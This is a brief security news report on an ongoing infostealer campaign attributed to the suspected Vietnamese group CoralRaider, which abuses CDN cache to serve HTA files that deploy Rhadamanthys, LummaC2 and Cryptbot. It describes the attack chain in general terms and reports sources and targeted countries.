Data Security, Threat Intelligence, Malware

Ongoing international infostealer campaign involves CDN cache

Computer Hacked, System Error, Virus, Cyber attack, Malware Concept. Danger Symbol. 3d rendering.

BleepingComputer reports that U.S., Germany, Japan, and UK systems have been subjected to ongoing attacks by suspected Vietnamese hacking group CoralRaider leveraging a content delivery network cache to facilitate the deployment of information-stealing payloads.

Intrusions commence with the delivery of an archive with a malicious .LNK file, which when opened runs an HTML Application file retrieved from a CDN platform subdomain to avert detection, according to a Cisco Talos report. Such an HTA file would enable the execution of a PowerShell decrypter script meant to evade Windows Defender before deploying the Rhadamanthys, LummaC2, or Cryptbot infostealers.

Further examination revealed CoralRaider's utilization of newer iterations of the Rhadamanthys and LummaC2 malware, as well as an enhanced version of Cryptbot with more comprehensive targets aside from improved anti-analysis and obfuscation techniques. Attacks part of the campaign have been associated with CoralRaider due to the presence of tactics, techniques, and procedures observed in the group's previous attacks.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.